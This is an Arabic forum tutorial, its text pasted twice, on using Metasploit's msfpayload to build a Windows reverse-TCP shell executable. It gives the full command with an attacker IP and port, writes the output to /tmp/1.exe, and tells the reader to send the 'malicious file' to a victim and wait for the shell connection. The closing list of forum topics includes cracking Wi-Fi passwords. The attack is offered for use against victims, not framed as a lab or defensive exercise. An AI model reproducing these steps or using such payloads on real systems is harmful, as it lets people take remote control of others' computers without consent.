بسم الله الرحمن الرحيم
=================
ما هي Binary Payloads وما وظيفتها ؟
Binary Payloads نقدر نقول عليها ملفات تنفيذية علي جميع الانتظمة اي انها في انظمة الوندوز تكون بامتداد exe وفي اللنكس sh , prel , python , ruby
و في الماك تكون mdg اي انها الملفات التي عند الضغط عليها يتم تنفيذها وظيفتها انها تكون ملغمه بباكدور او باتش او بايلود كلها
مسميات واحده لملف خبيث يتم ذرعه في الملف التنفيذي علي اي نظام
وتلك الطريقه من افضل الطرق التي يمكن ان تخترق بها من خلال الميتا اسبوليت بعكس طرق الثغرات
وده لان الضحيه بيبقي عنده ملف بيتصل بينا او احنا بنتصل بيه علي حسب اعدادت الملف .
من المعروف ان الميتا اسبوليت لها العديد من الواجهات وهي كالتالي
Msfgui , armget , msfconsole , msfcli , msfpayload
كل تلك الوجهات يمكن تنفيذ وتكوين الملفات التنفيذية الملغمة بكل سهولة من خلالها
يمكنكم مراجعه الرابط التالي لمعرفة كيفيه عمل تلك الملفات من خلال الوجهة msfgui
تكوين الباكدور عن طريق msfgui واختراق الجهاز
طيب ايه الجديد في درسنا اليوم
ما يميز الميتا اسبوليت انه هناك دائما طرق كثيرة للوصول الي نفس النتيجه
وده بيوفر الكثير من الجهد والمجهود اليوم سوف اشرح اذاي تكون تلك الملفات من خلال
الواجه msfpayload
الموضوع بسيط جدا سوف نستعمل توزيعه الباك تراك
بالنسبه للواجه msfpayload
الطريقه كالتالي افتح الطرفية واكتب الامر التالي
دعونا نشرح الامر بتروي msfpayload
نوع الوجه التي سوف يتم استخدماها في التنفيذ windows/shell_reverse_tcp نوع الملف الذي سوف يتم عمله
وطبعا هيبقي لينا دروس اخري عن تلك الانواع يكفي الان ان نعرف انه نوعه هكذا وفي النهاية O بمعني اعرضلي الخيارات
التي سوف احتاجها من اجل تكوين هذا الملف المفروض هيطلعلك نتائج مثل هذة
جميل جدا تعالوا نفصص تلك الخياريات وهي كالتالي
Name: Windows Command Shell, Reverse TCP Inline اسم الملف المراد تكوينه ونوعه ونوع الاتصال وهو tcp
Version: 6479 اصدار الملف المراد تكوينه
Platform: Windows نظام التشغيل الذي يعمل عليه
Arch: x86نوع المعالج الذي يعمل عليه
Needs Admin: No تحتاج الملف لصلاحيات الادمن لا طبعا
Total size: 287حجم الملف بالكيلوبايت
Provided by: vlad902 vlad902@gmail.com الراجل صاحب الملف
كل ما سبق معلومات عن الملف نفسه نحتاج الي نعرف الخيارات المتاحه لينا من اجل تنفيذ الملف
الملف هنا يحتاج الي الخيار LHOST وهو الاي بي الخاص بينا احنا المخترق يعني
وهنا ايضا يحتاج الي الخيار LPORT هو البورت الخاص بالمخترق ايضا وهنا هو محدد بورت افتراضي يمكنك الالتزام به او تجاهله وتغير البورت
Connect back to attacker and spawn a command shell هنا ده السطر بشرحلك الوظيفه اللي بيقوم بيها الملف هذا الملف بيقلك انه بعيمل
اتصال بينك وبين الضحيه وبيفتحله شل بينك وبين جهاز الضحية .
الان بعد ما عرفنا معلومات عن الملف المراد تكوينه معرفنا ايضا معلومات عن طريقه الاستخدام
كيف نقوم بتنفيذ الملف نقوم بعمل الامر التالي
نبدأ نفصص الامر واحده واحده
msfpayload طبعا اسم الواجه المستخدمة في عمل الملف
windows/shell_reverse_tcp نوع الباكدور المستخدم
LHOST=172.16.104.130 طبعا هنا اول خيار من خيرات التي تم التعرف عليها سابقا في الامر السابق هنا وضعنا الخيار ووضعنا الاي بي الخاص بينا
LPORT=31337 هنا طبعا ثاني خيار ايضا من الخيارات التي تم التعرف عليها من الامر السابق وبعدها وضعنا البروت المستخدم في جهازنا
X لاننا نريد استخدام الملف كلمف exe لانظمة الوندوز لازم تعمل حرف الاكس ده طبعا لو عايزين ملف بريل مثلا نخليها pl او py او rb حسب نظام التشغيل المراد اختراقه
> /tmp/1.exe الامتداد الذي نريد وضع الملف فيه واسمه
الان نذهب الي المجلد tmp هنلاقي ملف اسمه 1.exe هو ده الملف الخبيث بتاعنا
ونبعث به للضحية ولكن قبل ذلك يجب ان نقوم بالخطوة رقم 2 وهي انتظار الاتصال الخاص بالضحية اولا
لكي يتم الاختراق
مع تحيات فريق عمل المنتدي العربى
=================
ما هي Binary Payloads وما وظيفتها ؟
Binary Payloads نقدر نقول عليها ملفات تنفيذية علي جميع الانتظمة اي انها في انظمة الوندوز تكون بامتداد exe وفي اللنكس sh , prel , python , ruby
و في الماك تكون mdg اي انها الملفات التي عند الضغط عليها يتم تنفيذها وظيفتها انها تكون ملغمه بباكدور او باتش او بايلود كلها
مسميات واحده لملف خبيث يتم ذرعه في الملف التنفيذي علي اي نظام
وتلك الطريقه من افضل الطرق التي يمكن ان تخترق بها من خلال الميتا اسبوليت بعكس طرق الثغرات
وده لان الضحيه بيبقي عنده ملف بيتصل بينا او احنا بنتصل بيه علي حسب اعدادت الملف .
من المعروف ان الميتا اسبوليت لها العديد من الواجهات وهي كالتالي
Msfgui , armget , msfconsole , msfcli , msfpayload
كل تلك الوجهات يمكن تنفيذ وتكوين الملفات التنفيذية الملغمة بكل سهولة من خلالها
يمكنكم مراجعه الرابط التالي لمعرفة كيفيه عمل تلك الملفات من خلال الوجهة msfgui
تكوين الباكدور عن طريق msfgui واختراق الجهاز
طيب ايه الجديد في درسنا اليوم
ما يميز الميتا اسبوليت انه هناك دائما طرق كثيرة للوصول الي نفس النتيجه
وده بيوفر الكثير من الجهد والمجهود اليوم سوف اشرح اذاي تكون تلك الملفات من خلال
الواجه msfpayload
الموضوع بسيط جدا سوف نستعمل توزيعه الباك تراك
بالنسبه للواجه msfpayload
الطريقه كالتالي افتح الطرفية واكتب الامر التالي
- الكود:
msfpayload windows/shell_reverse_tcp O
دعونا نشرح الامر بتروي msfpayload
نوع الوجه التي سوف يتم استخدماها في التنفيذ windows/shell_reverse_tcp نوع الملف الذي سوف يتم عمله
وطبعا هيبقي لينا دروس اخري عن تلك الانواع يكفي الان ان نعرف انه نوعه هكذا وفي النهاية O بمعني اعرضلي الخيارات
التي سوف احتاجها من اجل تكوين هذا الملف المفروض هيطلعلك نتائج مثل هذة
- الكود:
Name: Windows Command Shell, Reverse TCP Inline
Version: 6479
Platform: Windows
Arch: x86
Needs Admin: No
Total size: 287
Provided by:
vlad902 vlad902@gmail.com
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC seh yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Description:
Connect back to attacker and spawn a command shell
جميل جدا تعالوا نفصص تلك الخياريات وهي كالتالي
Name: Windows Command Shell, Reverse TCP Inline اسم الملف المراد تكوينه ونوعه ونوع الاتصال وهو tcp
Version: 6479 اصدار الملف المراد تكوينه
Platform: Windows نظام التشغيل الذي يعمل عليه
Arch: x86نوع المعالج الذي يعمل عليه
Needs Admin: No تحتاج الملف لصلاحيات الادمن لا طبعا
Total size: 287حجم الملف بالكيلوبايت
Provided by: vlad902 vlad902@gmail.com الراجل صاحب الملف
كل ما سبق معلومات عن الملف نفسه نحتاج الي نعرف الخيارات المتاحه لينا من اجل تنفيذ الملف
- الكود:
LHOST yes The local address
الملف هنا يحتاج الي الخيار LHOST وهو الاي بي الخاص بينا احنا المخترق يعني
- الكود:
LPORT 4444 yes The local port
وهنا ايضا يحتاج الي الخيار LPORT هو البورت الخاص بالمخترق ايضا وهنا هو محدد بورت افتراضي يمكنك الالتزام به او تجاهله وتغير البورت
Connect back to attacker and spawn a command shell هنا ده السطر بشرحلك الوظيفه اللي بيقوم بيها الملف هذا الملف بيقلك انه بعيمل
اتصال بينك وبين الضحيه وبيفتحله شل بينك وبين جهاز الضحية .
الان بعد ما عرفنا معلومات عن الملف المراد تكوينه معرفنا ايضا معلومات عن طريقه الاستخدام
كيف نقوم بتنفيذ الملف نقوم بعمل الامر التالي
- الكود:
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
نبدأ نفصص الامر واحده واحده
msfpayload طبعا اسم الواجه المستخدمة في عمل الملف
windows/shell_reverse_tcp نوع الباكدور المستخدم
LHOST=172.16.104.130 طبعا هنا اول خيار من خيرات التي تم التعرف عليها سابقا في الامر السابق هنا وضعنا الخيار ووضعنا الاي بي الخاص بينا
LPORT=31337 هنا طبعا ثاني خيار ايضا من الخيارات التي تم التعرف عليها من الامر السابق وبعدها وضعنا البروت المستخدم في جهازنا
X لاننا نريد استخدام الملف كلمف exe لانظمة الوندوز لازم تعمل حرف الاكس ده طبعا لو عايزين ملف بريل مثلا نخليها pl او py او rb حسب نظام التشغيل المراد اختراقه
> /tmp/1.exe الامتداد الذي نريد وضع الملف فيه واسمه
الان نذهب الي المجلد tmp هنلاقي ملف اسمه 1.exe هو ده الملف الخبيث بتاعنا
ونبعث به للضحية ولكن قبل ذلك يجب ان نقوم بالخطوة رقم 2 وهي انتظار الاتصال الخاص بالضحية اولا
لكي يتم الاختراق
مع تحيات فريق عمل المنتدي العربى
الإثنين أغسطس 03, 2015 8:19 pm من طرف momenmomen44
» لعبة ذا لوست تايتنز The Lost Titans
الإثنين مارس 24, 2014 5:16 pm من طرف Admin
» شرح التسجيل فى لعبة ذا لوست تايتنز The Lost Titans
الإثنين مارس 24, 2014 4:31 pm من طرف Admin
» شرح لعبة اللودز - شرح التسجيل في لعبة Allods
الثلاثاء مارس 04, 2014 2:54 pm من طرف Admin
» شرح كسر باسوورد أي شبكة ويفي ببرنامج Commview for wifi
السبت يونيو 15, 2013 9:43 pm من طرف nadel
» شرح تعطيل الدوال و تشغيل السيف مود
الخميس مايو 30, 2013 11:33 pm من طرف Admin
» شرح لمنع الـ Nmap من فحص بورتات السيرفر
الخميس مايو 30, 2013 11:10 pm من طرف Admin
» اوامر اعادة التشغيل السيرفرات
الخميس مايو 30, 2013 10:39 pm من طرف Admin
» تثبين الاداه set و اعدادها بشكل صحيح لتعمل علي توزيعات لينكس
السبت أبريل 20, 2013 1:43 pm من طرف Admin